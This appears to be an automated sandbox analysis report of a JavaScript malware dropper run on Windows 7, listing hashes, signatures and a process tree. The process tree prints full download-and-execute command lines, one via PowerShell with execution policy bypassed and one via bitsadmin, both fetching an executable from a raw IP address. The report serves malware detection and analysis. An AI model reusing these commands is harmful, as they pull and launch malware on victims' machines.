Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
26/03/2025, 03:07
Static task
static1
Behavioral task
behavioral1
Sample
94fefbae1f1c369c6fcc718d0ea40828b98f55b18c8b4fa68915ceef2d725707.js
Resource
win7-20250207-en
8 signatures
150 seconds
General
-
Target
94fefbae1f1c369c6fcc718d0ea40828b98f55b18c8b4fa68915ceef2d725707.js
-
Size
720B
-
MD5
ae846ea82b1d91f86790be6f0ebcf771
-
SHA1
2ac8c84cd73cddc5f56573ef431b9eda914bc63b
-
SHA256
94fefbae1f1c369c6fcc718d0ea40828b98f55b18c8b4fa68915ceef2d725707
-
SHA512
ed9718786972eccc49d8e8f7294a6bedaa026662d637c9016fdd64cf4106b72772d61f08274c15a6da7583bb38035c470eeac3f77ac3cb94185c4aa70430734e
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://217.8.117.63/wtava.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 2272 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2280 bitsadmin.exe -
pid Process 2272 powershell.exe 2272 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2272 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2272 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2872 wrote to memory of 2040 2872 wscript.exe 28 PID 2872 wrote to memory of 2040 2872 wscript.exe 28 PID 2872 wrote to memory of 2040 2872 wscript.exe 28 PID 2872 wrote to memory of 2240 2872 wscript.exe 30 PID 2872 wrote to memory of 2240 2872 wscript.exe 30 PID 2872 wrote to memory of 2240 2872 wscript.exe 30 PID 2040 wrote to memory of 2272 2040 cmd.exe 32 PID 2040 wrote to memory of 2272 2040 cmd.exe 32 PID 2040 wrote to memory of 2272 2040 cmd.exe 32 PID 2240 wrote to memory of 2280 2240 cmd.exe 33 PID 2240 wrote to memory of 2280 2240 cmd.exe 33 PID 2240 wrote to memory of 2280 2240 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\94fefbae1f1c369c6fcc718d0ea40828b98f55b18c8b4fa68915ceef2d725707.js1⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/wtava.exe','C:\Users\Admin\AppData\Local\Temp\7865336.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\7865336.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/wtava.exe','C:\Users\Admin\AppData\Local\Temp\7865336.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\7865336.exe'3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/wtava.exe C:\Users\Admin\AppData\Local\Temp\75365357.exe&start C:\Users\Admin\AppData\Local\Temp\75365357.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/wtava.exe C:\Users\Admin\AppData\Local\Temp\75365357.exe3⤵
- Download via BitsAdmin
PID:2280
-
-